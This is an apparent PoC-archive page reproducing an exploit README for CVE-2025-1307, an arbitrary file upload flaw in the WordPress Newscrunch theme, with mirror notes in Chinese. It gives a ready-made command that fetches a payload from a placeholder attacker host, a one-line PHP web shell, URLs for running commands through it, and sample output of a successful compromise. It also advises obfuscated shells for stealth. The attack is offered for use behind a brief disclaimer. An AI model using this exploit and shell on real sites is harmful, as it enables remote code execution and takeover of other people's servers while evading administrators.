POC详情: 90a68eb28d0e9ace13bfe2e7831976d6b687e965

来源
关联漏洞
标题: Newscrunch <= 1.8.4 - 经认证(注册用户+)任意文件上传漏洞 (CVE-2025-1307)
描述:针对WordPress的Newscrunch主题在所有版本中,包括1.8.4.1版本,存在任意文件上传漏洞。该漏洞是由于newscrunch_install_and_activate_plugin()函数中缺少能力检查所导致的。这使得具有订阅者级别及以上访问权限的经过身份验证的攻击者能够在受影响站点的服务器上上传任意文件,从而可能实现远程代码执行。
描述
Newscrunch <= 1.8.4 - Authenticated (Subscriber+) Arbitrary File Upload
介绍
# Newscrunch Exploit (CVE-2025-1307)

## 🚨 Overview
This exploit targets a critical vulnerability (**CVE-2025-1307**) in the **Newscrunch WordPress theme**. The flaw allows **authenticated users (Subscriber and above)** to upload arbitrary files due to missing capability checks in the `newscrunch_install_and_activate_plugin()` function. This can lead to **Remote Code Execution (RCE)**, compromising the affected WordPress site completely.

---

## 🔥 Vulnerability Details
- **CVE ID:** CVE-2025-1307
- **Affected Software:** Newscrunch WordPress Theme (<= 1.8.4.1)
- **CWE Classification:** [CWE-862 - Missing Authorization](https://cwe.mitre.org/data/definitions/862.html)
- **CVSS Score:** **9.8 (Critical)**
- **Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- **Published Date:** March 4, 2025

### 🛑 Severity & Impact
- ✅ **Remote Code Execution (RCE)**
- ✅ **Full System Compromise**
- ✅ **Unauthorized File Upload**
- ✅ **Privilege Escalation Risk**

**Exploitability:** Requires a valid WordPress account with **Subscriber privileges or higher**.

---

## 📜 Script Features
✅ **Automated Exploitation of CVE-2025-1307**  
✅ **Auto-detection of vulnerable theme version**  
✅ **Automatic ZIP payload extraction and execution**  
✅ **Retrieves shell file name dynamically from ZIP**  
✅ **Auto-checks shell availability after exploitation**  
✅ **Clean and structured logging for debugging**  

---

## 🚀 How to Use

### 📌 Prerequisites
Ensure you have **Python 3.x** installed and install the required dependencies:
```bash
pip install requests urllib3 packaging
```

### 🔧 Running the Exploit
```bash
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
```

### 🔹 Usage
```
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload
```

### 🛠️ Using the Uploaded Shell
Once the shell is successfully uploaded, it allows remote command execution on the target system. The shell file should be placed inside a ZIP archive, and it will be extracted automatically upon exploitation.

### 🔹 Creating the ZIP Payload
Ensure your PHP shell (shell.php) is inside a ZIP archive. Then, upload the ZIP file using the exploit.
```php
<?php system($_GET['cmd']); ?>
```

### 🔹 Executing Commands
You can execute system commands via the browser by appending the cmd parameter to the shell URL:
```
http://target/wp-content/plugins/shell.php?cmd=whoami
```

### ⚠️ Securing the Shell
- Since this is a simple web shell, it lacks authentication and should be used cautiously.
- If detected, it can be easily removed by administrators.
- Consider using obfuscated PHP code or password-protected shells for stealth operations.

### 🔹 Expected Output
```
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
```

### ⚠️ Disclaimer
This tool is for educational and security research purposes only. Unauthorized exploitation of vulnerabilities is illegal and punishable by law. The author is not responsible for any misuse or damages caused by this tool. Use responsibly. 


*By: Nxploit | Khaled Alenazi*
文件快照

[4.0K] /data/pocs/90a68eb28d0e9ace13bfe2e7831976d6b687e965 ├── [6.5K] CVE-2025-1307.py └── [3.8K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。